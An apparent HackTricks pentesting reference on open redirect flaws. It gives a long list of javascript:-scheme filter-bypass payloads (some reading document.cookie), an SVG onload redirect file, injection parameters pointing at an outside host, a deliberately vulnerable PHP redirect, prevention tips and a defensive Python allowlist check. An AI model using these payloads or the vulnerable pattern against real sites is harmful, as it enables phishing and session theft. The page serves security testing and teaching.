Open Redirect

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)

Other ways to support HackTricks:

Open Redirect

Redirect to localhost or to an arbitrary domain

URL Format Bypass

Open Redirect to XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Open Redirect by uploading SVG files

An open redirect vulnerability can be exploited when uploading SVG files. When an application allows users to upload files and does not properly validate the redirect URL, an attacker can upload a malicious SVG file containing a crafted URL that redirects users to a malicious website. This can be used in phishing attacks to trick users into visiting a fake website that appears legitimate.

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Common injection parameters

An open redirect vulnerability exists when a web application allows users to navigate to an external URL of the attacker's choosing. This can be exploited by an attacker to trick users into visiting malicious websites while appearing to be on a trusted domain. To identify open redirect vulnerabilities, testers should look for the following parameters in URLs:

  • url

  • link

  • next

  • target

  • rurl

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Code examples

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

Open Redirect

An open redirect is a vulnerability that an attacker can abuse to send users to a malicious site. The attacker sends a link that is disguised to look like it points to a trusted site. When the user clicks the link, the open redirect fires and sends them to a site under the attacker's control. This lets the attacker lead users to phishing sites or malware.

response.redirect("http://mysafedomain.com");

PHP

Open Redirect

An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Attackers can abuse this vulnerability to trick users into visiting malicious sites by disguising the malicious URL as a trustworthy one.

Example

<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>

In this example, the PHP script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicioussite.com to redirect users to a malicious site.

Prevention

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a list of safe URLs to compare against. Additionally, avoid using user-controlled input directly in the redirect mechanism.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
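The allowlist check described under Prevention, as an added Python illustration (not the page's PHP code): it accepts only a local absolute path or an http(s) URL whose authority is exactly one of the constructed allowlisted hosts, and rejects the control-character, backslash, userinfo and scheme tricks from the payload list above. The hosts in `ALLOWED_HOSTS` and the inputs in `demo()` are constructed for the example.

```python
"""Allowlist-based validation of a user-supplied redirect target (illustrative)."""
from urllib.parse import urlsplit

# Constructed allowlist: the only hosts an absolute redirect may point to.
ALLOWED_HOSTS = {"mysafedomain.com", "www.mysafedomain.com"}
SAFE_DEFAULT = "/"


def safe_redirect_target(target: str, allowed_hosts=ALLOWED_HOSTS,
                         default: str = SAFE_DEFAULT) -> str:
    """Return `target` if it is a same-site path or an http(s) URL on an
    allowlisted host, otherwise `default`. `target` is the already
    URL-decoded parameter value, as a web framework hands it over."""
    if not target:
        return default
    # Tabs, CR/LF, NUL, NBSP (%09, %0d%0a, %01, %a0) and backslashes (%5c)
    # drive most of the filter bypasses on this page: browsers strip or
    # normalise them while URL parsers often do not, so reject outright.
    if any(c.isspace() or not c.isprintable() or c == "\\" for c in target):
        return default
    try:
        parts = urlsplit(target)
    except ValueError:  # newer Pythons reject malformed authorities
        return default
    if parts.scheme or parts.netloc:
        # Absolute ("https://host/..") or scheme-relative ("//host/..") URL.
        # javascript:, data: etc. are never acceptable; "http:/evil" (no
        # authority, which browsers repair to http://evil/) is not either.
        if parts.scheme.lower() not in ("", "http", "https"):
            return default
        # Exact authority match: this also rejects "trusted@evil" userinfo
        # tricks, "trusted.evil" lookalikes and unexpected ports.
        if parts.netloc.lower() not in allowed_hosts:
            return default
        return target
    # Relative reference: accept only a local absolute path, never "//host".
    if target.startswith("/") and not target.startswith("//"):
        return target
    return default


def demo() -> list:
    """Run a few constructed candidates through the check."""
    candidates = ["/account", "https://mysafedomain.com/login",
                  "//malicioussite.com", "javascript:alert(1)",
                  "java\r\nscript:alert(0)", "/\\malicioussite.com"]
    return [(c, safe_redirect_target(c)) for c in candidates]


if __name__ == "__main__":
    for candidate, result in demo():
        print(f"{candidate!r:40} -> {result!r}")
```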

Tools

Resources
